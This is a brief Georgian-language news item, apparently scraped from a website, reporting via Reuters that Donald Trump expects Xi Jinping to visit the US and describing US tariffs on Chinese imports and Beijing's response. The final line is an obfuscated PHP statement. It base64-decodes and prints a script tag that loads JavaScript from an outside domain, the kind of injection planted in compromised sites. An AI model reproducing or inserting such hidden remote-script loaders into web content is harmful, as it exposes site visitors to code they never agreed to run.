tube
ავერსი jaluzi

აშშ-ის პრეზიდენტის, დონალდ ტრამპის განცხადებით, ჩინეთის პრეზიდენტი, სი ძინპინი, შესაძლოა, „არც ისე შორეულ მომავალში“ შეერთებულ შტატებს ეწვიოს, - ინფორმაციას Reuters-ი ავრცელებს.

„ის ჩამოვა. არც თუ ისე შორეულ მომავალში“, - აღნიშნა ტრამპმა.

Reuters-ი წერს, რომ აღნიშნულ საკითხთან დაკავშირებით კომენტარი არც თეთრ სახლში გააკეთეს და არც ვაშინგტონში ჩინეთის საელჩოში.

ტრამპმა თანამდებობის მეორე ვადით დაკავების შემდეგ ჩინეთიდან ყველა სახის იმპორტზე 20%-იანი გადასახადი დააწესა.

მისი თქმით, პეკინმა არ შეაჩერა აშშ-ის ტერიტორიაზე იმ ქიმიკატების ნაკადის შესვლა, რომელსაც უკანონო ფენტანილის დასამზადებლად იყენებდნენ და რაც აშშ-ში ნარკოტიკების გადაჭარბებული დოზით მოხმარების სიკვდილის მთავარი მიზეზია.

ჩინეთი აშშ-ის მიერ დაწესებულ ტარიფებს აპროტესტებს და აცხადებს, რომ სერიოზული ზომები მიიღო ნარკოტიკების წინააღმდეგ ბრძოლაში. ამასთან, პეკინმა ვაშინგტონს საპასუხო სავაჭრო ზომები დაუწესა.

95
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");